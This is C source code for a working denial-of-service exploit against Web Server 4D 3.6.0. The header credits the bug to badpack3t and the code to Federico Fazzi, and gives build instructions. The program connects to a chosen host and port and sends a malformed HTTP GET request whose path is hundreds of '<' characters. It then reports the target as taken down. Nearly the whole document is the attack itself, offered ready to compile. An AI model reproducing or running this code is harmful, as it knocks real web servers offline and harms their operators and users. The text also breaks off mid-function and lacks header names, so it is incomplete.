/* Web server 4D 3.6.0 denial of service */ /* bug found by badpack3t. */ /* ftp://ftp.mdgcs.com/demos/WS4D/Win/WS4D_3.6.0_Full.exe */ /* */ /* $ gcc -o f_ws4d f_ws4d.c (linux version) */ /* $ gcc -o f_ws4d f_ws4d.c -DWINDOWS (windows version) */ /* */ /* $ ./f_ws4d */ /* */ /* Federico Fazzi */ #include #include #include #if WINDOWS #include #pragma comment(lib, "ws2_32.lib") #else #include #include #include #include #include #endif int usage(char *f); char f_call[] = "\x47\x45\x54\x20\x2F\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C\x3C" "\x3C\x3C\x3C\x3C\x3C\x20\x48\x54\x54\x50\x2F\x31\x2E\x31\x20"; int main(int argc, char *argv[]) { #if WINDOWS WSADATA wsaData; WORD wVersionRequested; int port; int size; SOCKET sockfd; #else int sockfd; socklen_t size; in_port_t port = atoi(argv[2]); #endif struct sockaddr_in structaddr; struct hostent *sockhost; char *reply = (char *)malloc(512); if(argc < 2) usage((char *) basename(argv[0])); #if WINDOWS wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; #endif printf("* Webserver 4D 3.6.0 denial of service\n\n"); #if WINDOWS if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { perror("socket_func"); exit(1); } #else if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket_func"); exit(1); } #endif printf("getting socket.. done!\n"); sockhost = gethostbyname(argv[1]); if(sockhost == NULL) herror("gethostbyname_func"); size = sizeof(structaddr); memset((void *) &structaddr, 0x00, size); bcopy(sockhost->h_addr, &structaddr.sin_addr, sockhost->h_length); structaddr.sin_family = AF_INET; structaddr.sin_port = htons((u_short)port); printf("getting connection.. "); if(connect(sockfd, (struct sockaddr *) &structaddr, size) == -1) { printf("error!\n"); perror("connect_func"); exit(1); } printf("done!\n"); printf("sending exploit in hex format.. "); if(write(sockfd, f_call, sizeof(f_call)) == -1) { printf("error!\n"); perror("send_func"); exit(1); } printf("done!\n"); printf("target: %s on port %d have been dossed!\n\n", sockhost->h_name, port); #if WINDOWS closesocket(sockfd); #else close(sockfd); #endif return(0); } int usage(char *f) { printf("Webserver 4D 3.6.0 denial of service\n"); printf("Federico Fazzi